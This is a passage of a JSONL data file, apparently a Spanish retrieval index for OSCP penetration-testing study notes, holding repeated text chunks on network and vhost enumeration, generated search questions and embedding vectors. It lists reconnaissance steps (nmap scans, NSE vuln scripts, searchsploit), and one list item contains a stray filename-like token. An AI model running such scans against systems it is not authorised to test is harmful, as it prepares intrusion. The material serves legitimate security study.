-0.04394, 0.01226, 0.00981, 0.01901, -0.00454, -0.04258, -0.0069, -0.04544, -0.00534, -0.02671, 0.00989, 0.00538, -0.03485, -0.05714, 0.00778, 0.00731, -0.02366, 0.01835, 0.03786, -0.03663, 0.04625, 0.04039, 0.10916, -0.02692, -0.0369, 0.06675, -0.00896, -0.00424, 0.03878, 0.02463, 0.09216, 0.05763, 0.10316, -0.05676, -0.00956, -0.00312, 0.04084, -0.00866, -0.02342, 0.08788, 0.03186, 0.04087, 0.06501, 0.01952, -0.04147, -0.02148, -0.06406, 0.03703, 0.0358, -0.00933, -0.02417, -0.02584, -0.05266, 0.00073, 0.02757, -0.00382, -0.02988, 0.00799, -0.04242, -0.03678, -0.01155, 0.02733, 0.00922, -0.03472, 0.05518, 0.02171, -0.07765, 0.04146, 0.01099]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n (Γ­ndice)\n\n> \"EnumeraciΓ³n exhaustiva\" es el paso 1 de la MetodologΓ­a OSCP y donde mΓ‘s gente pierde horas.\n> La mayorΓ­a de los fallos del examen son enumeraciΓ³n incompleta, no falta de tΓ©cnica.", "indexar": "cual es el mejor software para evitar fallos por enumeraciΓ³n incompleta en ciberseguridad?", "v": [0.11975, 0.03407, -0.04747, 0.06264, 0.06653, -0.18723, 0.02118, -0.07083, -0.16153, -0.04991, -0.08684, -0.03909, -0.08952, -0.00233, 0.04754, -0.01166, 0.02188, -0.1024, 0.00704, 0.05216, -0.00626, -0.12641, -0.02296, -0.10772, -0.07412, 0.03493, -0.11073, 0.00957, -0.09641, -0.03993, 0.13362, -0.04707, 0.11361, -0.05365, -0.03168, 0.15054, -0.03523, 0.01507, -0.04892, 0.03952, 0.04764, 0.06969, -0.08244, 0.01694, 0.03748, -0.1093, 0.00477, -0.03021, 0.1732, -0.07863, -0.05818, 0.01909, -0.03641, -0.08805, 0.01031, -0.13737, 0.12213, -0.02825, 0.11076, -0.12044, -0.08577, 0.06175, -0.05099, 0.04231, 0.00994, -0.03586, -0.0461, -0.05277, -0.12248, 0.11814, 0.03043, 0.06989, 4e-05, 0.00085, -0.00065, -0.06231, -0.00819, -0.01875, 0.03861, 0.03742, -0.06646, -0.03111, -0.05102, 0.0561, -0.09654, -0.13278, 0.05039, 0.02308, -0.01453, -0.0506, 0.05049, 0.04415, -0.05223, -0.04552, 0.09315, -0.02974, 0.17358, 0.03838, -0.04321, 0.0742, 0.0095, -0.06947, -0.0507, 0.09796, -0.10357, 0.07643, -0.05267, -0.01513, 0.01225, -0.08443, -0.04692, 0.08313, 0.04725, -0.03274, -0.07917, -0.06384, -0.00714, -0.06048, 0.05509, 0.0065, 0.03498, -0.09323, -0.05147, -0.07213, 0.06686, 0.10314, -0.00178, 0.14149, -0.05668, -0.08186, -0.05823, -0.05043, -0.0785, -0.05833, -0.06962, 0.02664, 0.05476, -0.11276, -0.06929, 0.02914, 0.03711, 0.03118, -0.01994, 0.06318, 0.03713, 0.06515, -0.03466, -0.03929, -0.07187, 0.03204, -0.00403, 0.09788, -0.0002, 0.05989, -0.09675, 0.05037, -0.02887, -0.03064, 0.02348, 0.03888, 0.05869, 0.04132, 0.0237, -0.01444, -0.03712, -0.07851, 0.03598, 0.05449, 0.00859, 0.00783, -0.04908, 0.12462, -0.04617, -0.11518, -0.05156, -0.02712, 0.001, -0.06248, 0.02451, -0.03347, -0.05459, -0.05702, 0.02278, 0.07681, 0.03043, -0.06235, 0.03014, -0.0123, 0.00073, -0.03135, 0.01961, 0.01768, -0.01951, -0.02188, 0.0455, -0.00588, -0.01094, -0.05844, 0.04363, 0.0179, -0.03174, 0.00706, -0.04275, 0.00954, 0.06727, 0.03845, 0.0316, -0.01232, -0.00892, 0.03663, 0.07551, -0.04319, 0.05909, -0.07434, -0.07028, -0.05662, 0.03261, 0.06605, -0.09758, -0.0413, 0.01723, -0.00097, -0.01005, -0.00566, -0.01248, 0.05455, 0.01852, 0.04485, 0.02098, -0.00226, 0.0041, -0.02439, -0.04694, -0.04244, 0.0523, -0.01692, 0.00552, -0.06152, -0.06049, -0.06605, 0.00352, 0.08741, -0.01095, -0.10017, 0.00393, -0.03828, -0.1022, 0.00011, -0.00482, -0.08381, -0.04209, 0.01491, 0.02706, -0.05226, 0.03783, -0.0588]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Flujo\n1. **Mi IP / red** β†’ `ip a | grep \"inet \"` (el 3er octeto del lab **cambia** al reiniciar).\n2. **Descubrimiento de hosts** β†’ ping/ARP sweep (Nmap).\n3. **Escaneo de puertos** β†’ top-1000 **y** `-p-` completo (Puertos olvidados).\n4. **Por servicio**:\n - 445 β†’ SMB\n - UDP 161 β†’ SNMP\n - 80/443 β†’ EnumeraciΓ³n web + Content discovery + Hacking web\n - 3389 β†’ RDP\n - texto plano (!OS-57179836-OSCP.ovpn25, 110...) β†’ Netcat\n1. **Scripts NSE** β†’ Nmap NSE (`-sCV`, `--script vuln`).\n2. **VersiΓ³n + exploits** β†’ `nmap -sV` β†’ searchsploit.", "indexar": "ΒΏQuΓ© programa sirve para descubrir quΓ© puertos estΓ‘n abiertos en una red desconocida?", "v": [0.06532, 0.11428, -0.0945, -0.00244, 0.13325, -0.09437, 0.10348, -0.17068, -0.00384, -0.21035, -0.1025, -0.05313, -0.01896, -0.09392, 0.03313, -0.06033, 0.03652, 0.04675, 0.13979, 0.01927, -0.01172, -0.02542, -0.07238, -0.09409, 0.05994, -0.01932, 0.08673, -0.03091, -0.04251, 0.0258, 0.00678, 0.00466, 0.05349, -0.02721, 0.01224, -0.01172, 0.11815, -0.03149, 0.01772, 0.02804, 0.08505, -0.04288, 0.04967, 0.00306, 0.13927, -0.03678, -0.10056, -0.09216, -0.00397, 0.03311, -0.09767, 0.05925, -0.05458, -0.02041, 0.04322, -0.01969, -0.05689, 0.03324, -0.0421, 0.02391, 0.00098, 0.04011, 0.01339, -0.05857, 0.02535, -0.18433, 0.01196, 0.11525, -0.04147, 0.04802, -0.05707, -0.02406, 0.03722, 0.05966, -0.01798, 0.03008, -0.03666, -0.02066, 0.09193, 0.02611, 0.09277, 0.104, 0.01461, 0.01283, 0.03163, -0.06598, 0.00625, -0.02132, -0.04149, -0.1252, 0.02346, 0.04891, 0.00383, 0.18075, 0.00194, -0.01559, 0.05942, 0.04265, -0.03713, 0.08782, 0.00832, -0.0346, -0.05611, 0.06548, -0.05341, 0.08358, 0.00424, -0.09874, 0.04769, 0.06767, 0.10481, -0.00953, -0.02366, -0.05487, -0.04497, -0.00487, 0.00664, -0.07886, -0.01904, 0.00039, -0.13092, 0.0041, -0.06501, 0.00742, 0.04689, -0.07042, -0.06513, 0.15389, 0.05091, 0.05433, 0.07119, -0.01487, -0.09382, -0.07144, -0.08285, -0.11929, 0.05499, -0.06952, -0.01632, -0.04197, -0.033, 0.05031, -0.04542, -0.04198, 0.00099, 0.03119, 0.03864, -0.0186, -0.05503, 0.02185, -0.0464, 0.00177, -0.04581, 0.09956, -0.03947, 0.04091, 0.11008, -0.05023, -0.1315, 0.05962, -0.05042, -0.00511, -0.09982, -0.05363, 0.06095, -0.06159, -0.0267, -0.02926, 0.07131, 0.03969, -0.00062, 0.11352, -0.04602, -0.07984, -0.02918, -0.05198, -0.06296, -0.10783, -0.00546, -0.02228, -0.0536, 0.06262, 0.00317, 0.00301, -0.07586, -0.09894, 0.0121, -0.10493, -0.01619, 0.06075, -0.00601, -0.06673, -0.01813, -0.0668, -0.00549, -0.00584, 0.0511, 0.03693, -0.0164, -0.01612, 0.00119, 0.04319, -0.00382, 0.00529, 0.06393, 0.07924, -0.09123, 0.08068, 0.02486, 0.15366, -0.0166, 0.00147, 0.07827, 0.01641, -0.04264, 0.01576, -0.03771, 0.07077, 0.07262, 0.0684, -0.00118, 0.01997, 0.01463, 0.04281, 0.04118, -0.04352, 0.08514, 0.00128, 0.03399, 0.05055, 0.045, -0.02188, -0.07509, -0.00918, -0.00421, -0.01457, 0.02559, 0.02606, -0.01622, -0.02095, 0.02071, 0.05234, -0.04579, -0.08374, 0.05669, -0.05209, -0.04891, 0.04228, -0.00437, -0.00926, -0.1108, 0.08792, 0.01529, -0.04928, 0.05815, 0.01281]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Flujo\n1. **Mi IP / red** β†’ `ip a | grep \"inet \"` (el 3er octeto del lab **cambia** al reiniciar).\n2. **Descubrimiento de hosts** β†’ ping/ARP sweep (Nmap).\n3. **Escaneo de puertos** β†’ top-1000 **y** `-p-` completo (Puertos olvidados).\n4. **Por servicio**:\n - 445 β†’ SMB\n - UDP 161 β†’ SNMP\n - 80/443 β†’ EnumeraciΓ³n web + Content discovery + Hacking web\n - 3389 β†’ RDP\n - texto plano (!OS-57179836-OSCP.ovpn25, 110...) β†’ Netcat\n1. **Scripts NSE** β†’ Nmap NSE (`-sCV`, `--script vuln`).\n2. **VersiΓ³n + exploits** β†’ `nmap -sV` β†’ searchsploit.", "indexar": "Con quΓ© herramienta puedo identificar el servicio que corre en los puertos mΓ‘s comunes como 445 o 80?", "v": [0.11106, 0.07819, -0.04406, -0.0551, 0.05694, -0.17444, 0.12991, -0.03329, -0.14136, -0.13954, -0.22199, 0.02381, 0.01865, -0.05349, 0.06761, 0.00898, 0.05911, -0.07426, 0.01076, 0.00697, -0.08923, -0.05988, -0.02723, -0.05119, -0.07362, 0.05653, 0.03882, -0.04415, -0.12382, -0.01178, 0.02339, 0.01645, 0.08614, -0.0152, -0.07264, -0.1532, -0.11323, 0.09127, 0.01319, 0.03919, 0.02657, 0.01381, -0.05452, -0.02765, 0.10551, -0.07094, -0.13414, -0.0189, 0.04594, -0.04413, -0.05968, -0.10161, -0.09587, -0.01173, -0.06424, -0.0344, 0.12375, 0.0714, 0.01557, -0.10973, -0.07524, 0.03317, -0.11359, -0.07392, 0.05042, -0.08071, -0.04753, -0.04444, -0.14404, 0.00917, -0.03029, 0.00021, -0.0418, 0.07559, 0.04082, -0.0083, 0.00355, 0.04111, 0.06945, -0.05859, 0.15346, -0.01631, -0.05869, -0.08588, -0.05667, -0.11271, -0.02258, -0.08523, 0.05007, -0.09482, 0.03906, 0.05217, 0.01474, 0.08058, -0.01238, 0.00555, 0.04902, 0.07688, 0.00343, 0.06039, 0.11717, 0.0469, -0.12253, 0.09352, -0.02532, 0.0144, 0.0081, -0.08595, -0.02259, -0.03111, 0.01616, -0.00994, 0.02856, -0.0553, 0.02112, 0.01858, -0.00456, -0.07783, 0.0397, -0.04036, 0.01118, -0.0887, 0.03368, 0.01577, 0.02411, -0.06634, -0.04374, 0.13643, 0.04241, -0.08056, 0.00941, 0.04704, -0.08568, -0.03026, 0.03642, 0.00684, 0.06278, -0.10454, 0.0168, -0.0336, 0.00838, 0.06131, -0.00783, -0.09608, 0.05905, 0.02306, 0.03022, -0.02346, -0.10072, -0.02499, 0.03082, 0.05393, -0.02571, 0.06778, -0.01921, 0.03631, 0.04948, -0.07501, -0.08384, 0.00294, -0.06859, -0.08199, 0.00136, -0.05414, 0.03765, -0.03233, -0.03196, -0.00636, 0.12447, 0.00678, -0.00178, 0.0506, -0.03816, -0.14642, 0.04788, -0.06568, -0.12797, -0.04519, -0.01179, -0.06691, -0.06463, -0.01963, -0.01933, -0.08427, -0.0335, -0.0485, -0.02342, -0.03515, 0.01474, 0.08081, 0.00264, 0.0403, -0.01652, -0.02067, -0.00514, 0.04849, -0.03138, -0.03346, -0.0188, -0.04339, -0.08344, 0.00404, 0.01706, -0.0331, 0.00539, 0.07864, -0.06362, 0.02885, 0.02073, 0.09858, 0.04232, -0.06205, 0.03541, -0.02873, -0.03239, 0.02402, 0.07032, 0.0468, 0.03187, 0.02381, 0.02564, -0.00403, -0.01722, 0.03292, -0.0322, 0.02499, 0.04773, 0.04025, 0.0808, 0.04977, 0.0404, -0.03827, -0.07865, -0.03414, 0.04117, 0.01194, 0.03242, -0.03464, -0.05807, -0.02191, 0.07795, 0.02973, -0.0156, -0.00773, 0.03375, -0.05013, -0.05491, 0.03126, -0.07476, -0.08375, 0.02135, 0.02108, 0.08351, -0.02751, 0.04584, -0.07986]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Flujo\n1. **Mi IP / red** β†’ `ip a | grep \"inet \"` (el 3er octeto del lab **cambia** al reiniciar).\n2. **Descubrimiento de hosts** β†’ ping/ARP sweep (Nmap).\n3. **Escaneo de puertos** β†’ top-1000 **y** `-p-` completo (Puertos olvidados).\n4. **Por servicio**:\n - 445 β†’ SMB\n - UDP 161 β†’ SNMP\n - 80/443 β†’ EnumeraciΓ³n web + Content discovery + Hacking web\n - 3389 β†’ RDP\n - texto plano (!OS-57179836-OSCP.ovpn25, 110...) β†’ Netcat\n1. **Scripts NSE** β†’ Nmap NSE (`-sCV`, `--script vuln`).\n2. **VersiΓ³n + exploits** β†’ `nmap -sV` β†’ searchsploit.", "indexar": "Existe alguna alternativa libre a Nmap para hacer un escaneo completo de puertos y versiones?", "v": [-0.06475, 0.0425, -0.20741, 0.03261, -0.08399, -0.07389, 0.07058, -0.11594, -0.21562, -0.07428, -0.06861, -0.08943, 0.05937, 0.00875, 0.00215, -0.02956, -0.02505, -0.0235, 0.11571, 0.14022, -0.17631, -0.01829, -0.10694, -0.04898, -0.01821, 0.0213, -0.07927, 0.05015, -0.10663, 0.04119, -0.01858, 0.1016, 0.07085, -0.06166, 0.00393, -0.08331, 0.19286, -0.14087, 0.03895, -0.05532, 0.04942, 0.04165, -0.0333, -0.00958, 0.02935, -0.10718, -0.11679, 0.01053, 0.03612, -0.03007, -0.01311, -0.00925, -0.11811, 0.03678, 0.02355, -0.0612, 0.15975, -0.0327, -0.02134, -0.07169, -0.10382, 0.09684, 0.05507, -0.11711, -0.02914, -0.02058, -0.06934, 0.03601, -0.05927, 0.07348, -0.06018, 0.04703, 0.09441, 0.02655, -0.15793, -0.07298, -0.05908, -0.01052, -0.03633, 0.10289, 0.06949, -0.03547, -0.10738, -0.03466, -0.068, -0.06539, -0.00704, -0.08252, 0.02946, -0.06006, 0.04055, -0.05392, 0.00786, 0.14088, 0.00707, -0.0908, -0.00894, 0.07966, 0.02158, 0.05996, 0.1323, 0.06326, -0.09763, 0.03574, -0.02179, 0.01703, 0.06435, -0.03582, -0.01981, 0.10585, 0.02976, 0.09876, -0.04813, -0.00782, -0.01824, -0.04709, -0.02017, -0.00577, -0.00926, 0.04072, -0.01584, -0.04479, -0.07356, -0.01743, -0.00186, 0.0644, -0.02533, 0.09464, 0.01133, 0.00526, 0.03993, -0.04636, -0.09628, -0.12371, -0.08604, -0.0619, 0.06993, -0.07694, 0.01407, -0.03213, -0.0978, 0.06113, -0.00963, 0.00184, -0.05626, 0.02867, -0.01413, -0.04622, -0.01717, -0.00392, -0.02065, 0.05967, -0.07744, 0.10153, -0.03069, -0.00554, 0.04767, -0.01044, -0.01329, 0.11807, 0.0542, 0.01623, -0.04459, 0.02769, -0.01216, -0.04614, -0.04797, -0.0258, -0.06614, -0.01668, 0.00811, 0.15273, 0.05322, -0.11616, 0.04932, -0.07423, -0.00136, -0.06996, -0.00528, -0.00846, 0.00308, 0.06554, -0.0592, -0.03667, -0.0419, -0.06664, -0.00669, -0.02954, -0.01012, 0.02319, 5e-05, 0.05825, -0.04544, -0.06003, -0.04731, 0.02351, 0.0312, -0.01497, -0.01953, 0.00138, -0.09774, -0.02854, -0.03211, -0.04641, -0.0118, 0.04245, -0.04274, 0.05428, 0.02797, 0.06849, 0.02641, 0.01026, -0.00246, 0.00109, -0.02654, -0.02686, 0.01484, 0.01764, 0.06938, 0.03141, -0.02804, 0.04915, -0.01812, 0.06288, 0.00015, 0.03892, 0.08211, 0.03007, -0.00976, 0.05548, 0.05493, 0.0424, 0.00851, -0.00426, 0.02115, 0.01071, 0.02274, 0.03554, -0.00579, -0.0421, 0.00294, -0.00232, -0.00434, -0.00455, 0.00057, -0.09702, 0.00165, 0.00609, 1e-05, -0.02614, -0.03533, 0.0455, 0.00592, -0.02544, 0.03182, -0.02821]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## No olvides\n- Trampas de enumeraciΓ³n (UDP, puertos altos, vhosts, wordlists pequeΓ±as).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo β†’ Hacking web.\n\nRelacionado: Operadores Bash Β· OSCP MOC", "indexar": "que programa automatizo el escaneo de puertos altos en bash", "v": [-0.02353, -0.15448, -0.11983, -0.05487, -0.00519, -0.084, 0.10443, -0.22073, -0.23913, -0.02047, -0.11293, 0.04765, 0.0053, 0.02401, 0.00397, -0.0239, 0.00362, 0.02097, 0.04747, 0.16335, -0.0036, 0.00888, -0.01898, 0.0148, 0.02319, 0.0609, -0.08064, 0.07253, -0.13085, 0.12874, -0.04953, 0.04884, 0.06409, -0.04471, 0.11918, -0.13251, 0.08566, -0.03881, 0.08061, 0.08956, 0.00744, 0.07022, -0.08152, -0.11252, 0.19126, -0.10133, 0.01627, 0.01953, 0.11575, -0.09805, -0.00991, -0.06044, -0.02108, 0.01464, 0.06838, -0.08517, 0.06066, 0.02194, -0.02507, -0.08633, -0.03668, 0.08163, 0.07731, 0.00954, -0.11831, 0.01785, 0.08062, 0.01349, 0.001, 0.0676, -0.03209, -0.00579, 0.06689, 0.1062, 0.02232, 0.00761, -0.039, -0.03842, 0.00827, -0.02681, -0.08265, -0.04842, 0.01559, 0.0445, -0.09354, -0.08465, -0.07514, -0.03524, 0.0117, -0.00475, 0.0106, -0.06527, 0.04528, 0.12014, 0.1178, -0.01022, 0.10007, -0.02135, 0.01317, 0.07412, 0.03579, -0.00026, -0.09805, 0.13568, -0.00357, 0.03764, 0.05561, -0.04293, 0.03865, 0.14775, 0.06826, 0.04951, 0.05595, -0.07863, -0.07382, -0.00089, 0.01079, -0.0607, 0.01265, -0.04032, -0.03018, -0.02599, -0.01777, 0.01521, 0.03988, -0.02408, -0.02307, 0.14536, 0.00998, 0.02332, 0.08145, 0.02785, -0.03711, -0.07629, -0.06957, -0.08517, 0.03993, -0.07594, -0.02874, -0.0933, -0.09783, 0.15235, -0.04612, 0.00463, 0.02727, -0.00061, -0.02525, -0.02038, -0.01254, 0.01151, -0.00501, 0.04676, -0.02983, 0.01335, -0.11578, 0.01148, 0.10234, 0.01188, -0.04163, 0.02867, 0.00722, -0.02587, -0.06035, 0.01939, 0.04343, -0.01483, -0.01435, 0.0325, -0.02301, 0.04431, -0.05002, 0.11513, -0.02178, -0.08272, -0.02657, 0.04603, 0.02131, -0.07512, -0.02895, 0.03372, -0.06077, 0.06533, 0.06606, -0.04914, -0.02513, -0.04692, -0.01593, -0.05742, 0.02718, 0.0581, -0.00902, 0.00054, -0.06758, 0.0022, -0.04151, 0.04797, -0.01994, 0.01268, 0.02904, -0.01132, -0.01331, 0.06426, 0.05159, -0.05917, 0.04036, 0.06807, -0.0502, -0.0071, 0.04805, 0.09947, -0.03042, 0.00278, 0.03308, 0.0169, 0.00136, -0.04058, -0.00813, 0.04905, 0.04047, 0.05042, -0.07238, -0.01451, 0.00987, 0.04799, -0.0577, -0.04336, 0.08462, 0.04667, 0.02261, 0.01302, -0.04902, -0.06431, -0.01978, -0.02669, -0.02172, 0.00338, -0.00141, -0.01586, 0.02207, -0.07552, -0.01525, 0.00584, 0.02288, -0.07033, 0.02504, -0.02306, -0.01738, 0.00222, 0.00733, 0.05407, -0.0304, 0.05979, -0.04155, -0.04659, 0.01466, 0.0102]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## No olvides\n- Trampas de enumeraciΓ³n (UDP, puertos altos, vhosts, wordlists pequeΓ±as).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo β†’ Hacking web.\n\nRelacionado: Operadores Bash Β· OSCP MOC", "indexar": "cual herramienta sirve para hacer enumeraciΓ³n de vhosts sin caΓ±Γ³n", "v": [-0.02762, -0.04569, -0.10932, -0.09563, 0.06421, -0.19102, -0.13926, -0.01318, -0.03814, -0.10168, -0.15443, -0.06786, -0.04434, -0.03936, 0.01741, 0.17065, 0.16364, -0.06218, 0.00229, 0.12375, -0.10682, 0.00478, -0.05308, 0.02123, -0.13102, 0.00488, 0.07665, -0.0086, -0.23349, 0.0352, 0.06414, -0.01931, 0.00271, 0.00563, -0.05575, -0.10785, -0.04612, 0.07979, 0.00853, 0.14322, 0.0036, 0.07206, -0.01729, 0.04354, -0.09624, -0.02396, -0.02979, 0.00366, 0.04714, 0.07583, -0.03001, -0.12632, -0.08421, -0.07262, 0.02442, -0.16806, 0.15028, -0.1857, 0.04251, -0.1194, -0.03155, -0.0567, -0.03407, -0.069, 0.03672, 0.03417, -0.01864, -0.04282, -0.07383, 0.04818, -0.0144, 0.03537, 0.1503, 0.00596, -0.02989, -0.10976, 0.00981, -0.00383, 0.02903, 0.00559, 0.0603, -0.04332, -0.06154, -0.00796, -0.062, -0.04306, 0.09739, 0.00888, 0.08077, -0.04598, -0.00039, 0.10613, 0.02991, 0.0349, 0.08237, -0.07659, 0.12, -0.00839, -0.026, -0.0109, 0.23732, -0.05908, -0.12838, 0.12175, -0.00286, -0.0031, -0.06846, 0.02134, -0.11318, -0.01387, 0.10365, 0.04288, -0.05225, 0.04956, -0.02967, 0.00431, -0.06719, -0.08149, 0.01099, -0.02098, 0.02773, 0.01929, -0.09169, 0.03139, 0.04817, -0.00853, 0.01272, 0.03691, 0.01704, -0.09709, 0.03415, -0.05727, 0.01015, 0.00384, -0.0105, -0.02855, 0.02128, -0.11714, 0.00842, -0.06378, 0.00915, 0.02427, -0.06213, -0.04757, 0.02245, 0.04863, 0.09754, -0.06449, 0.01149, -0.00605, 0.0595, -0.03544, 0.00056, 0.02533, -0.01594, -0.05343, 0.01877, 0.01278, -0.11942, 0.0617, 0.02252, -0.08307, 0.04486, -0.01652, 0.01079, -0.01947, 0.01598, 0.04651, 0.04296, 0.03355, 0.03437, 0.01908, 0.02546, 0.00188, 0.01878, -0.02311, -0.05408, 0.00018, -0.01843, -0.04043, 0.01668, -0.03694, -0.06378, 0.00986, 0.03235, -0.05653, 0.05498, -0.0049, -0.01905, 0.00656, -0.06232, -0.02482, -0.01518, -0.06853, 0.02982, 0.01797, 0.02157, -0.07808, 0.03393, -0.04236, 0.00218, -0.0077, -0.01453, 0.00374, 0.03227, 0.0523, -0.03645, -0.07449, -0.00281, 0.01122, -0.01826, 0.03624, 0.02422, 0.00632, 0.033, -0.00041, -0.00782, 0.01034, -0.04453, -0.01085, -0.02539, -0.05689, -0.00304, -0.00649, -0.00595, 0.05214, 0.02412, -0.0286, -0.04346, 0.0088, 0.0503, -0.02561, -0.01495, 0.06143, -0.00458, -0.09494, 0.03478, -0.01027, -0.00429, 0.00499, -0.03148, -0.02177, 0.02615, -0.00625, -0.03901, -0.02568, 0.03681, -0.03889, -0.07763, -0.05226, -0.03679, -0.02832, 0.05652, 0.00921, 0.01543, 0.02882]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## No olvides\n- Trampas de enumeraciΓ³n (UDP, puertos altos, vhosts, wordlists pequeΓ±as).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo β†’ Hacking web.\n\nRelacionado: Operadores Bash Β· OSCP MOC", "indexar": "como monto un bucle sobre ips para realizar hacking web", "v": [0.17345, -0.0534, -0.16875, -0.01072, -0.03691, -0.13924, -0.04284, -0.02829, -0.11027, -0.02964, 0.03013, 0.06107, 0.00377, 0.02651, 0.02708, -0.04325, -0.03722, -0.08907, -0.04943, -0.08069, -0.00992, 0.01395, -0.10489, 0.05122, -0.06078, -0.06588, -0.15297, 0.1528, -0.1519, -0.10693, 0.00035, -0.10131, -0.12967, 0.08816, -0.15201, -0.10709, 0.03704, 0.12513, 0.04666, 0.04243, -0.08168, 0.03443, -0.15904, 0.02609, -0.03591, 0.0133, 0.03945, -0.10005, 0.06869, 0.0043, -0.01669, -0.04124, -0.15745, -0.06175, -0.00263, -0.06061, 0.1077, -0.06248, 0.04017, -0.07221, -0.08549, 0.10937, -0.00191, -0.03846, -0.03197, -0.00472, -0.04145, -0.06604, -0.12661, 0.02012, 0.0375, -0.03846, 0.00479, 0.04919, 0.04627, -0.00409, 0.07061, 0.0347, 0.02968, -0.05349, -0.07265, -0.00456, -0.02811, 0.09997, -0.18036, 0.03289, 0.0219, -0.15007, 0.01879, 0.02551, 0.08727, 0.13958, -0.01665, -0.05367, -0.09419, -0.03237, 0.07831, 0.06653, 0.0058, -0.0693, -0.07763, 0.00427, -0.02028, 0.10463, 0.00615, 0.1395, 0.07905, 0.03875, -0.00282, -0.10853, -0.01608, 0.03804, -0.10951, 0.02268, -0.02629, -0.0606, 0.03791, 0.00832, 0.02266, -0.07658, -0.05033, 0.01422, -0.01747, 0.07085, 0.05825, -0.01454, -0.02549, 0.0388, -0.06725, -0.04812, 0.03094, -0.01538, -0.07228, 0.00314, 0.00371, -0.02252, -0.03461, -0.09952, 0.02628, -0.0485, 0.06067, 0.05144, -0.1161, 0.00018, 0.04515, 0.01595, 0.05461, -0.07359, -0.0739, -0.01346, -0.01064, 0.0773, -0.07474, 0.03511, -0.12556, 0.01156, -0.06784, -0.086, 0.0077, 0.08463, 0.01153, 0.02591, 0.00843, -0.04052, -0.03994, 0.00976, -0.04577, -0.00255, 0.03043, 0.00388, -0.03141, 0.06606, -0.04396, -0.09309, 0.03551, -0.02254, -0.05144, -0.01615, 0.03247, -0.08359, -0.06999, -0.02142, 0.05342, 0.02846, -0.07601, -0.02685, 0.08384, 0.02229, -0.04543, 0.06716, 0.01792, -0.05682, -0.05156, 0.09115, -0.00402, -0.05837, -0.04625, -0.03706, 0.07392, -0.02108, -0.03027, -0.02512, 0.00443, -0.03554, -0.04197, 0.01304, -0.0049, -0.06339, -0.04694, 0.04651, 0.06037, -0.02284, 0.00257, -0.06324, 0.00559, -0.00828, 0.05616, 0.01093, -0.07052, -0.00856, 0.02403, 0.04452, -0.01075, 0.02738, -0.02733, 0.05206, 0.02145, 0.0239, -0.02092, 0.00963, -0.04761, -0.00209, -0.03833, -0.01098, 0.00634, 0.00849, 0.01325, -0.00523, -0.04536, -0.05089, 0.02129, 0.01069, 0.02879, -0.07612, -0.01041, -0.10655, -0.07806, 0.05072, 0.00329, -0.03158, -0.05402, 0.00586, -0.00718, 0.00328, -0.0477, 0.02502]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeraciΓ³n.", "indexar": "cual es la diferencia entre un vhost y un subdominio en apache?", "v": [-0.10514, -0.05638, 0.03041, 0.05213, -0.01966, 0.00083, -0.03325, -0.12426, -0.10377, -0.06393, -0.1084, -0.13416, -0.15326, -0.02983, 0.0295, -0.09004, 0.14153, -0.04576, -0.00983, 0.08225, -0.02291, 0.00295, -0.0563, 0.05675, -0.06092, -0.04962, 0.10835, 0.08956, -0.08964, -0.04475, 0.06283, -0.07616, 0.04497, 0.01596, -0.00058, -0.02818, 0.05304, -0.06327, -0.01539, 0.14884, -0.02092, 0.0453, 0.00166, 0.04307, -0.02896, -0.03328, -0.15915, 0.0766, 0.09166, -0.11785, -0.17908, 0.06021, -0.14761, -0.0548, -0.02473, 0.02423, 0.15304, -0.09402, 0.07662, -0.0605, -0.10026, -0.0564, 0.01843, -0.07627, 0.13998, -0.11164, -0.12475, -0.02198, -0.10572, -0.02216, -0.02652, 0.06884, 0.00804, -0.02163, 0.02806, 0.03572, 0.02291, 0.04887, -0.11611, -0.00112, 0.09178, 0.0493, -0.01073, 0.06832, -0.07159, -0.12461, 0.03551, -0.12578, 0.03882, -0.02604, 0.05109, 0.08258, -0.02662, 0.09903, 0.0059, -0.11099, 0.09419, -0.01269, -0.04854, -0.10026, 0.1062, 0.09588, -0.03808, 0.18555, 0.06359, 0.1094, 0.03377, -0.01425, -0.06103, -0.0578, 0.07886, 0.07522, -0.04962, 0.0355, -0.10876, -0.04783, -0.08087, -0.01503, 0.0644, -0.08563, -0.05982, -0.0787, -0.06116, 0.02609, 0.04148, 0.01495, 0.0591, 0.08606, -0.00982, 0.08802, -0.0023, -0.02514, -0.03026, -0.00323, -0.01415, 0.00227, 0.05034, -0.07693, 0.02556, 0.08245, -0.00233, -0.01732, -0.06006, 0.06463, 0.012, 0.00778, 0.02994, -0.11294, -0.06192, 0.02209, -0.05933, -0.01099, -0.00621, -0.03219, -0.10966, 0.01692, -0.0714, -0.08978, 